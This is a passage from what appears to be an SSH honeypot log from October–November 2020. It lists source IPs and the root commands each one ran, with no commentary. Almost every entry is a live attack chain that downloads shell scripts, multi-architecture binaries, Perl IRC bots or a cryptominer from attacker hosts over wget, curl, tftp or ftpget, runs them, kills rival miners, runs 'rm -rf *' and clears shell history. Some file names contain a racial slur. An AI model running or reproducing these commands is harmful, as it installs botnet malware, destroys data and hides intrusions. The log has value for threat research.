-g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.123/pwnInfect.sh curl -O http://193.228.91.123/pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp 193.228.91.123 -c get pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp -r pwnInfect2.sh -g 193.228.91.123 chmod 777 pwnInfect2.sh sh pwnInfect2.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh sh pwnInfect1.sh rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh rm -rf * From 185.239.242.89 19-Oct-2020 01:15:35 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://185.239.242.171/Bitchbins.sh; chmod 777 Bitchbins.sh; sh Bitchbins.sh; tftp 185.239.242.171 -c get Bitchtftp1.sh; chmod 777 Bitchtftp1.sh; sh Bitchtftp1.sh; tftp -r Bitchtftp2.sh -g 185.239.242.171; chmod 777 Bitchtftp2.sh; sh Bitchtftp2.sh; rm -rf Bitchbins.sh Bitchtftp1.sh Bitchtftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://185.239.242.171/Bitchbins.sh chmod 777 Bitchbins.sh sh Bitchbins.sh tftp 185.239.242.171 -c get Bitchtftp1.sh chmod 777 Bitchtftp1.sh sh Bitchtftp1.sh tftp -r Bitchtftp2.sh -g 185.239.242.171 chmod 777 Bitchtftp2.sh sh Bitchtftp2.sh rm -rf Bitchbins.sh Bitchtftp1.sh Bitchtftp2.sh rm -rf * From 40.124.33.10 19-Oct-2020 04:12:44 ssh2 root Exec uname -a & cat /proc/version uname -a cat /proc/version From 45.148.10.65 19-Oct-2020 09:16:03 ssh2 root Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh nc 1 1 rm s.sh wget http://45.148.10.186/s.sh busybox wget http://45.148.10.186/s.sh curl -O http://45.148.10.186/s.sh chmod 777 * sh s.sh From 167.99.139.54 19-Oct-2020 14:35:00 ssh2 root Exec cat /etc/issue ; wget 167.99.139.54/nigga.x86 ; curl -O 167.99.139.54/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 0day.autoroot.x86 ; wget 167.99.139.54/nigga.x32 ; curl -O 167.99.139.54/.x32 ; chmod 777 nigga.x32 ; ./nigga.x32 0day.autoroot ; wget 167.99.139.54/nigga.mips ; curl -O 167.99.139.54/.mips ; chmod 777 nigga.mips ; ./nigga.mips otherbinexecxdlmfao ; wget 167.99.139.54/nigga.arm ; curl -O 167.99.139.54/.arm ; chmod 777 nigga.arm ; ./nigga.arm 0day.autoroot ; wget 167.99.139.54/nigga.arm5 ; curl -O 167.99.139.54/.arm5 ; chmod 777 nigga.arm5 ; ./nigga.arm5 0day.autoroot ; wget 167.99.139.54/nigga.arm6 ; curl -O 167.99.139.54/.arm6 ; chmod 777 nigga.arm6 ; ./nigga.arm6 0day.autoroot ; wget 167.99.139.54/nigga.arm7 ; curl -O 167.99.139.54/.arm7 ; chmod 777 nigga.arm7 ; ./nigga.arm7 0day.autoroot ; wget 167.99.139.54/nigga.ppc ; curl -O 167.99.139.54/.ppc ; chmod 777 nigga.ppc ; ./nigga.ppc 0day.autoroot ; wget 167.99.139.54/nigga.sh4 ; curl -O 167.99.139.54/.sh4 ; chmod 777 nigga.sh4 ; ./nigga.sh4 0day.autoroot ; wget 167.99.139.54/nigga.m68k ; curl -O 167.99.139.54/.m68k ; chmod 777 nigga.m68k ; ./nigga.m68k 0day.autoroot ; rm -rf nigga* ; r9gj 167.99.139.54/bot.pl ; perl bot.pl ; curl -O 167.99.139.54/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c cat /etc/issue wget 167.99.139.54/nigga.x86 curl -O 167.99.139.54/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 0day.autoroot.x86 wget 167.99.139.54/nigga.x32 curl -O 167.99.139.54/.x32 chmod 777 nigga.x32 ./nigga.x32 0day.autoroot wget 167.99.139.54/nigga.mips curl -O 167.99.139.54/.mips chmod 777 nigga.mips ./nigga.mips otherbinexecxdlmfao wget 167.99.139.54/nigga.arm curl -O 167.99.139.54/.arm chmod 777 nigga.arm ./nigga.arm 0day.autoroot wget 167.99.139.54/nigga.arm5 curl -O 167.99.139.54/.arm5 chmod 777 nigga.arm5 ./nigga.arm5 0day.autoroot wget 167.99.139.54/nigga.arm6 curl -O 167.99.139.54/.arm6 chmod 777 nigga.arm6 ./nigga.arm6 0day.autoroot wget 167.99.139.54/nigga.arm7 curl -O 167.99.139.54/.arm7 chmod 777 nigga.arm7 ./nigga.arm7 0day.autoroot wget 167.99.139.54/nigga.ppc curl -O 167.99.139.54/.ppc chmod 777 nigga.ppc ./nigga.ppc 0day.autoroot wget 167.99.139.54/nigga.sh4 curl -O 167.99.139.54/.sh4 chmod 777 nigga.sh4 ./nigga.sh4 0day.autoroot wget 167.99.139.54/nigga.m68k curl -O 167.99.139.54/.m68k chmod 777 nigga.m68k ./nigga.m68k 0day.autoroot rm -rf nigga* r9gj 167.99.139.54/bot.pl perl bot.pl curl -O 167.99.139.54/bot.pl perl bot.pl rm -rf bot* rm -rf bot* history -c From 35.194.88.89 20-Oct-2020 04:06:44 ssh2 root Exec cat /etc/issue ; wget http://45.153.203.197/nigga.x86 ; curl -O http://45.153.203.197/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 0day.autoroot.x86 ; wget http://45.153.203.197/nigga ; curl -O http://45.153.203.197/nigga.x32 ; chmod 777 nigga.x32 ; ./nigga.x32 0day.autoroot ; wget http://45.153.203.197/nigga.mips ; curl -O http://45.153.203.197/nigga.mips ; chmod 777 nigga.mips ; ./nigga.mips 0day.autoroot.mips ; wget http://45.153.203.197/nigga.arm ; curl -O http://45.153.203.197/.arm ; chmod 777 nigga.arm ; ./nigga.arm 0day.autoroot ; wget http://45.153.203.197/nigga.arm5 ; curl -O http://45.153.203.197/nigga.arm5 ; chmod 777 nigga.arm5 ; ./nigga.arm5 0day.autoroot ; wget http://45.153.203.197/nigga.arm6 ; curl -O http://45.153.203.197/nigga.arm6 ; chmod 777 nigga.arm6 ; ./nigga.arm6 0day.autoroot ; wget http://45.153.203.197/nigga.arm7 ; curl -O http://45.153.203.197/nigga.arm7 ; chmod 777 nigga.arm7 ; ./nigga.arm7 0day.autoroot ; wget http://45.153.203.197/nigga.ppc ; curl -O http://45.153.203.197/.ppc ; chmod 777 nigga.ppc ; ./nigga.ppc 0day.autoroot ; wget http://45.153.203.197/nigga.sh4 ; curl -O http://45.153.203.197/nigga.sh4 ; chmod 777 nigga.sh4 ; ./nigga.sh4 0day.autoroot ; wget http://45.153.203.197/nigga.m68k ; curl -O http://45.153.203.197/nigga.m68k ; chmod 777 nigga.m68k ; ./nigga.m68k 0day.autoroot ; rm -rf nigga* ; r9gj http://45.153.203.197/bot.pl ; perl bot.pl ; curl -O http://45.153.203.197/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c cat /etc/issue wget http://45.153.203.197/nigga.x86 curl -O http://45.153.203.197/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 0day.autoroot.x86 wget http://45.153.203.197/nigga curl -O http://45.153.203.197/nigga.x32 chmod 777 nigga.x32 ./nigga.x32 0day.autoroot wget http://45.153.203.197/nigga.mips curl -O http://45.153.203.197/nigga.mips chmod 777 nigga.mips ./nigga.mips 0day.autoroot.mips wget http://45.153.203.197/nigga.arm curl -O http://45.153.203.197/.arm chmod 777 nigga.arm ./nigga.arm 0day.autoroot wget http://45.153.203.197/nigga.arm5 curl -O http://45.153.203.197/nigga.arm5 chmod 777 nigga.arm5 ./nigga.arm5 0day.autoroot wget http://45.153.203.197/nigga.arm6 curl -O http://45.153.203.197/nigga.arm6 chmod 777 nigga.arm6 ./nigga.arm6 0day.autoroot wget http://45.153.203.197/nigga.arm7 curl -O http://45.153.203.197/nigga.arm7 chmod 777 nigga.arm7 ./nigga.arm7 0day.autoroot wget http://45.153.203.197/nigga.ppc curl -O http://45.153.203.197/.ppc chmod 777 nigga.ppc ./nigga.ppc 0day.autoroot wget http://45.153.203.197/nigga.sh4 curl -O http://45.153.203.197/nigga.sh4 chmod 777 nigga.sh4 ./nigga.sh4 0day.autoroot wget http://45.153.203.197/nigga.m68k curl -O http://45.153.203.197/nigga.m68k chmod 777 nigga.m68k ./nigga.m68k 0day.autoroot rm -rf nigga* r9gj http://45.153.203.197/bot.pl perl bot.pl curl -O http://45.153.203.197/bot.pl perl bot.pl rm -rf bot* rm -rf bot* history -c From 104.237.233.113 20-Oct-2020 16:51:15 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://206.126.81.100/cometome; cat cometome > cm4ejhd; chmod +x cm4ejhd; ./cm4ejhd cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://206.126.81.100/cometome cat cometome > cm4ejhd chmod +x cm4ejhd ./cm4ejhd From 115.126.32.6 20-Oct-2020 20:10:43 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec cat /etc/os-release cat /etc/os-release From 125.212.233.74 23-Oct-2020 13:44:11 ssh2 root Exec cat /etc/issue ; yum install wget -y ; apt install wget -y ; wget 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue yum install wget -y Exec cat /etc/issue ; yum install wget -y ; apt install wget -y ; wget 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue yum install wget -y apt install wget -y wget 45.153.203.209/bot.pl perl bot.pl rm -rf bot.pl curl -O 45.153.203.209/bot.pl perl bot.pl rm -rf bot.pl history -c apt install wget -y wget 45.153.203.209/bot.pl perl bot.pl rm -rf bot.pl curl -O 45.153.203.209/bot.pl perl bot.pl rm -rf bot.pl history -c From 193.228.91.123 24-Oct-2020 10:46:54 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.142/hentai.sh; curl -O http://194.180.224.142/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp 194.180.224.142 -c get hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp -r hentai2.sh -g 194.180.224.142; chmod 777 hentai2.sh; sh hentai2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.142 hentai1.sh hentai1.sh; sh hentai1.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.142/hentai.sh curl -O http://194.180.224.142/hentai.sh chmod 777 hentai.sh sh hentai.sh tftp 194.180.224.142 -c get hentai.sh chmod 777 hentai.sh sh hentai.sh tftp -r hentai2.sh -g 194.180.224.142 chmod 777 hentai2.sh sh hentai2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.142 hentai1.sh hentai1.sh sh hentai1.sh rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh rm -rf * From 2.57.122.186 24-Oct-2020 21:29:04 ssh2 root Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh; cat /etc/issue; pkill iman; pkill xmrigMiner; pkill xmrig; pkill cnrig; nc 1 1 rm s.sh wget http://45.148.10.186/s.sh busybox wget http://45.148.10.186/s.sh curl -O http://45.148.10.186/s.sh chmod 777 * sh s.sh cat /etc/issue pkill iman pkill xmrigMiner pkill xmrig pkill cnrig From 103.144.200.5 26-Oct-2020 02:44:32 ssh2 root Exec wget http://88.218.16.87/wash.sh; curl -O http://88.218.16.87/wash.sh; chmod 777 wash.sh; sh wash.sh wget http://88.218.16.87/wash.sh curl -O http://88.218.16.87/wash.sh chmod 777 wash.sh sh wash.sh From 185.239.242.89 26-Oct-2020 09:09:00 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.145.185.82/Vividbins.sh; chmod 777 Vividbins.sh; sh Vividbins.sh; tftp 45.145.185.82 -c get Vividtftp1.sh; chmod 777 Vividtftp1.sh; sh Vividtftp1.sh; tftp -r Vividtftp2.sh -g 45.145.185.82; chmod 777 Vividtftp2.sh; sh Vividtftp2.sh; rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.145.185.82/Vividbins.sh chmod 777 Vividbins.sh sh Vividbins.sh tftp 45.145.185.82 -c get Vividtftp1.sh chmod 777 Vividtftp1.sh sh Vividtftp1.sh tftp -r Vividtftp2.sh -g 45.145.185.82 chmod 777 Vividtftp2.sh sh Vividtftp2.sh rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh rm -rf * From 2.57.122.195 26-Oct-2020 16:24:31 ssh2 root Exec nc 1 1;cat /etc/issue; wget https://nasapaul.com/cnrig; ./cnrig; nc 1 1 cat /etc/issue wget https://nasapaul.com/cnrig ./cnrig From 35.197.1.84 26-Oct-2020 21:53:06 ssh2 root Exec cat /etc/issue ; wget 35.247.147.161/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.247.147.161/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl cat /etc/issue wget 35.247.147.161/bot.pl perl bot.pl rm -rf bot.pl curl -O 35.247.147.161/bot.pl perl bot.pl history -c rm -rf bot.pl From 46.101.135.250 27-Oct-2020 01:13:09 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://67.205.177.215/Cipher777.sh; chmod 777 Cipher777.sh; sh Cipher777.sh Cipher; tftp 67.205.177.215 -c get Cipher777tftp1.sh; chmod 777 Cipher777tftp1.sh; sh Cipher777tftp1.sh Cipher; tftp -r Cipher777tftp2.sh -g 67.205.177.215; chmod 777 Cipher777tftp2.sh; sh Cipher777tftp2.sh Cipher; rm -rf Cipher777.sh Cipher777tftp1.sh Cipher777tftp2.sh; rm -rf *;history -c cd /tmp || cd /run || cd / wget http://67.205.177.215/Cipher777.sh chmod 777 Cipher777.sh sh Cipher777.sh Cipher tftp 67.205.177.215 -c get Cipher777tftp1.sh chmod 777 Cipher777tftp1.sh sh Cipher777tftp1.sh Cipher tftp -r Cipher777tftp2.sh -g 67.205.177.215 chmod 777 Cipher777tftp2.sh sh Cipher777tftp2.sh Cipher rm -rf Cipher777.sh Cipher777tftp1.sh Cipher777tftp2.sh rm -rf * history -c From 45.148.10.186 27-Oct-2020 01:58:29 ssh2 root Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh; nc 1 1 rm s.sh wget http://45.148.10.186/s.sh busybox wget http://45.148.10.186/s.sh curl -O http://45.148.10.186/s.sh chmod 777 * sh s.sh From 209.141.51.59 27-Oct-2020 08:21:02 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.170/h3lln3t.sh; curl -O http://45.14.224.170/h3lln3t.sh; chmod 777 h3lln3t.sh; sh h3lln3t.sh; tftp 45.14.224.170 -c get h3lln3t.sh; chmod 777 h3lln3t.sh; sh h3lln3t.sh; tftp -r h3lln3t2.sh -g 45.14.224.170; chmod 777 h3lln3t2.sh; sh h3lln3t2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.170 h3lln3t1.sh h3lln3t1.sh; sh h3lln3t1.sh; rm -rf h3lln3t.sh h3lln3t.sh h3lln3t2.sh h3lln3t1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.14.224.170/h3lln3t.sh curl -O http://45.14.224.170/h3lln3t.sh chmod 777 h3lln3t.sh sh h3lln3t.sh tftp 45.14.224.170 -c get h3lln3t.sh chmod 777 h3lln3t.sh sh h3lln3t.sh tftp -r h3lln3t2.sh -g 45.14.224.170 chmod 777 h3lln3t2.sh sh h3lln3t2.sh ftpget -v -u anonymous -p anonymous -P 21 45.14.224.170 h3lln3t1.sh h3lln3t1.sh sh h3lln3t1.sh rm -rf h3lln3t.sh h3lln3t.sh h3lln3t2.sh h3lln3t1.sh rm -rf * From 193.228.91.108 27-Oct-2020 11:27:54 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.109/Otpzl/7rtya.x86 curl -O http://193.228.91.109/Otpzl/7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 Exploit.x86 rm -rf 7rtya.x86 tftp 193.228.91.109 -c get 7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 TFTP.Exploit.x86 rm -rf 7rtya.x86 history -c From 34.65.109.41 27-Oct-2020 19:47:23 ssh2 root Exec cat /etc/issue ; wget 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 45.153.203.209/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl cat /etc/issue wget 45.153.203.209/bot.pl perl bot.pl rm -rf bot.pl curl -O 45.153.203.209/bot.pl perl bot.pl history -c rm -rf bot.pl From 34.126.97.229 28-Oct-2020 00:19:02 ssh2 root Exec cat /etc/issue ; wget https://transfer.sh/6iHN7/bot.pl/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O https://transfer.sh/6iHN7/bot.pl/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl cat /etc/issue wget https://transfer.sh/6iHN7/bot.pl/bot.pl perl bot.pl rm -rf bot.pl curl -O https://transfer.sh/6iHN7/bot.pl/bot.pl perl bot.pl history -c rm -rf bot.pl From 185.239.242.89 28-Oct-2020 04:56:11 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.172/8UsA.sh; curl -O http://45.153.203.172/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 45.153.203.172 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 45.153.203.172; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.153.203.172/8UsA.sh curl -O http://45.153.203.172/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 45.153.203.172 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 45.153.203.172 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 8UsA1.sh 8UsA1.sh sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf * From 34.78.38.251 28-Oct-2020 08:42:23 ssh2 root Exec cat /etc/issue ; wget 35.203.175.171/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.203.175.171/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl cat /etc/issue wget 35.203.175.171/bot.pl perl bot.pl rm -rf bot.pl curl -O 35.203.175.171/bot.pl perl bot.pl history -c rm -rf bot.pl From 101.96.89.207 29-Oct-2020 06:13:06 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.49.240.16/sensi.sh; curl -O http://185.49.240.16/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 185.49.240.16 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 185.49.240.16; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.49.240.16 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * ; wget 35.203.175.171/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.203.175.171/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://185.49.240.16/sensi.sh curl -O http://185.49.240.16/sensi.sh chmod 777 sensi.sh sh sensi.sh tftp 185.49.240.16 -c get sensi.sh chmod 777 sensi.sh sh sensi.sh tftp -r sensi2.sh -g 185.49.240.16 chmod 777 sensi2.sh sh sensi2.sh ftpget -v -u anonymous -p anonymous -P 21 185.49.240.16 sensi1.sh sensi1.sh sh sensi1.sh rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh rm -rf * wget 35.203.175.171/bot.pl perl bot.pl rm -rf bot.pl curl -O 35.203.175.171/bot.pl perl bot.pl history -c rm -rf bot.pl From 157.230.80.53 29-Oct-2020 06:32:08 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec cat /etc/issue cat /etc/issue From 222.186.46.13 29-Oct-2020 12:27:03 ssh2 root Exec echo 1 echo 1 From 34.80.219.76 30-Oct-2020 06:33:55 ssh2 root Exec cat /etc/issue ; wget 120.48.8.77/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 120.48.8.77/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl cat /etc/issue wget 120.48.8.77/bot.pl perl bot.pl rm -rf bot.pl curl -O 120.48.8.77/bot.pl perl bot.pl history -c rm -rf bot.pl From 45.153.203.172 31-Oct-2020 21:54:53 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.172/update.sh; curl -O http://45.153.203.172/update.sh; chmod 777 update.sh; sh update.sh; tftp 45.153.203.172 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 45.153.203.172; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.153.203.172/update.sh curl -O http://45.153.203.172/update.sh chmod 777 update.sh sh update.sh tftp 45.153.203.172 -c get update.sh chmod 777 update.sh sh update.sh tftp -r update2.sh -g 45.153.203.172 chmod 777 update2.sh sh update2.sh ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 update1.sh update1.sh sh update1.sh rm -rf update.sh update.sh update2.sh update1.sh rm -rf * From 37.46.150.243 1-Nov-2020 12:10:49 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.243/hentai.sh; curl -O http://37.46.150.243/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.46.150.243/hentai.sh curl -O http://37.46.150.243/hentai.sh chmod 777 hentai.sh sh hentai.sh rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh rm -rf * From 185.212.149.160 1-Nov-2020 12:36:44 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://107.175.94.18/Pumpkin.sh; chmod 777 Pumpkin.sh; sh Pumpkin.sh; tftp 107.175.94.18 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.94.18; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://107.175.94.18/Pumpkin.sh chmod 777 Pumpkin.sh sh Pumpkin.sh tftp 107.175.94.18 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 107.175.94.18 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 159.65.115.115 2-Nov-2020 17:55:41 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://104.168.195.213/Thorbins.sh chmod 777 Thorbins.sh sh Thorbins.sh tftp 104.168.195.213 -c get Thortftp1.sh chmod 777 Thortftp1.sh sh Thortftp1.sh tftp -r Thortftp2.sh -g 104.168.195.213 chmod 777 Thortftp2.sh sh Thortftp2.sh rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh rm -rf * Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 45.145.185.25 2-Nov-2020 19:19:56 ssh2 root Exec wget http://45.145.185.25/we.sh; curl -O http://45.145.185.25/we.sh; chmod 777 we.sh; sh we.sh wget http://45.145.185.25/we.sh curl -O http://45.145.185.25/we.sh chmod 777 we.sh sh we.sh From 167.71.177.87 3-Nov-2020 01:18:02 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://107.173.91.164/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 107.173.91.164 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 107.173.91.164; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://107.173.91.164/Ciabins.sh chmod 777 Ciabins.sh sh Ciabins.sh tftp 107.173.91.164 -c get Ciatftp1.sh chmod 777 Ciatftp1.sh sh Ciatftp1.sh tftp -r Ciatftp2.sh -g 107.173.91.164 chmod 777 Ciatftp2.sh sh Ciatftp2.sh rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh rm -rf * From 213.142.137.25 4-Nov-2020 06:05:38 ssh2 root Exec uname -a; cd /tmp; wget 185.82.200.52/n3;perl n3;rm -rf n3* uname -a cd /tmp wget 185.82.200.52/n3 perl n3 rm -rf n3* From 36.133.122.36 4-Nov-2020 19:13:31 ssh2 root Exec wget http://45.145.185.25/wash.sh; curl -O http://45.145.185.25/wash.sh; chmod 777 wash.sh; sh wash.sh wget http://45.145.185.25/wash.sh curl -O http://45.145.185.25/wash.sh chmod 777 wash.sh sh wash.sh From 45.126.132.175 6-Nov-2020 01:41:36 ssh2 root Exec uname -a; cd /tmp; wget http://185.82.200.52/n3; perl n3; rm -rf n3 uname -a cd /tmp wget http://185.82.200.52/n3 perl n3 rm -rf n3 From 64.227.11.94 6-Nov-2020 09:45:40 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.136.157/Mercury.sh; curl -O http://107.175.136.157/Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp 107.175.136.157 -c get Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp -r Mercury2.sh -g 107.175.136.157; chmod 777 Mercury2.sh; sh Mercury2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.136.157 Mercury1.sh Mercury1.sh; sh Mercury1.sh; rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh; rm -rf * ROOT Payload:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.136.157/bins/Mercury.x86 -O /tmp/Mercury; chmod +x /tmp/Mercury; /tmp/Mercury Mercury.x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.175.136.157/Mercury.sh curl -O http://107.175.136.157/Mercury.sh chmod 777 Mercury.sh sh Mercury.sh tftp 107.175.136.157 -c get Mercury.sh chmod 777 Mercury.sh sh Mercury.sh tftp -r Mercury2.sh -g 107.175.136.157 chmod 777 Mercury2.sh sh Mercury2.sh ftpget -v -u anonymous -p anonymous -P 21 107.175.136.157 Mercury1.sh Mercury1.sh sh Mercury1.sh rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh rm -rf * ROOT Payload:cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.175.136.157/bins/Mercury.x86 -O /tmp/Mercury chmod +x /tmp/Mercury /tmp/Mercury Mercury.x86 From 157.245.135.79 7-Nov-2020 21:41:53 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://185.243.215.254/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 185.243.215.254 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 185.243.215.254; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://185.243.215.254/yoyobins.sh chmod 